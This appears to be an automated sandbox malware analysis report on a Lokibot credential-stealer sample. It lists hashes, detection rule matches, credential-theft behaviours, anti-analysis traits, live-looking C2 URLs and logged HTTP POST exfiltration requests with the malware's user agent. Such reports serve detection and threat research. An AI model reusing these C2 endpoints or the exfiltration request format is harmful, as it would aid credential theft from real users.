Loading ...

Play interactive tourEdit tour

Windows Analysis Report rfxJzZjiWv.exe

Overview

General Information

Sample Name:rfxJzZjiWv.exe
Analysis ID:534005
MD5:8ed7e6b478cf0c00934bb42e3bdf5e20
SHA1:ceb70c6dc5a85a64cc7a47e0ec12936f2d5e57db
SHA256:4395224e257fe5659011fb90649c89d295e80123d7622d6cdb5b09371573e1aa
Tags:exeLoki
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Multi AV Scanner detection for domain / URL
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged

Classification

Process Tree

  • System is w10x64
  • rfxJzZjiWv.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\rfxJzZjiWv.exe" MD5: 8ED7E6B478CF0C00934BB42E3BDF5E20)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
rfxJzZjiWv.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    rfxJzZjiWv.exeJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      rfxJzZjiWv.exeJoeSecurity_LokibotYara detected LokibotJoe Security
        rfxJzZjiWv.exeLoki_1Loki Payloadkevoreilly
        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
        • 0x13ffc:$a2: last_compatible_version
        rfxJzZjiWv.exeLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x12fff:$des3: 68 03 66 00 00
        • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
              00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                  Click to see the 3 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                      0.0.rfxJzZjiWv.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                        0.0.rfxJzZjiWv.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                        • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                        • 0x13ffc:$a2: last_compatible_version
                        0.0.rfxJzZjiWv.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                        • 0x12fff:$des3: 68 03 66 00 00
                        • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                        • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                        Click to see the 6 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
                        Multi AV Scanner detection for submitted fileShow sources
                        Source: rfxJzZjiWv.exeVirustotal: Detection: 88%Perma Link
                        Source: rfxJzZjiWv.exeMetadefender: Detection: 88%Perma Link
                        Source: rfxJzZjiWv.exeReversingLabs: Detection: 96%
                        Antivirus / Scanner detection for submitted sampleShow sources
                        Source: rfxJzZjiWv.exeAvira: detected
                        Multi AV Scanner detection for domain / URLShow sources
                        Source: naourl.comVirustotal: Detection: 6%Perma Link
                        Source: http://naourl.com/data/five/fre.phpVirustotal: Detection: 11%Perma Link
                        Source: http://survey-smiles.comVirustotal: Detection: 5%Perma Link
                        Machine Learning detection for sampleShow sources
                        Source: rfxJzZjiWv.exeJoe Sandbox ML: detected
                        Source: rfxJzZjiWv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49752 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49765 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49766 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49767 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49768 -> 212.32.237.90:80
                        Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49768 -> 212.32.237.90:80
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                        Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                        Source: Joe Sandbox ViewASN Name: LEASEWEB-NL-AMS-01NetherlandsNL LEASEWEB-NL-AMS-01NetherlandsNL
                        Source: Joe Sandbox ViewIP Address: 212.32.237.90 212.32.237.90
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: global trafficHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 163Connection: close
                        Source: rfxJzZjiWv.exeString found in binary or memory: http://naourl.com/data/five/fre.php
                        Source: rfxJzZjiWv.exe, 00000000.00000002.662546536.0000000000751000.00000004.00000020.sdmpString found in binary or memory: http://survey-smiles.com
                        Source: rfxJzZjiWv.exeString found in binary or memory: http://www.ibsensoftware.com/
                        Source: unknownHTTP traffic detected: POST /data/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: naourl.comAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7B0651A2Content-Length: 190Connection: close
                        Source: unknownDNS traffic detected: queries for: naourl.com
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040648B URLDownloadToFileW,

                        System Summary:

                        barindex
                        Malicious sample detected (through community Yara rule)Show sources
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Loki Payload Author: kevoreilly
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                        Source: rfxJzZjiWv.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: rfxJzZjiWv.exe, type: SAMPLEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                        Source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040549C
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_004029D4
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: String function: 0041219C appears 45 times
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: String function: 00405B6F appears 41 times
                        Source: rfxJzZjiWv.exeVirustotal: Detection: 88%
                        Source: rfxJzZjiWv.exeMetadefender: Detection: 88%
                        Source: rfxJzZjiWv.exeReversingLabs: Detection: 96%
                        Source: rfxJzZjiWv.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/2@5/2
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

                        Data Obfuscation:

                        barindex
                        Yara detected aPLib compressed binaryShow sources
                        Source: Yara matchFile source: rfxJzZjiWv.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.rfxJzZjiWv.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rfxJzZjiWv.exe PID: 6644, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402AC0 push eax; ret
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeCode function: 0_2_00402AC0 push eax; ret
                        Source: rfxJzZjiWv.exeStatic PE information: section name: .x
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeProcess information set: NOGPFAULTERRORBOX
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exe TID: 6672Thread sleep time: -60000s >= -30000s
                        Source: C:\Users\user\Desktop\rfxJzZjiWv.exeLast function: Thread delayed
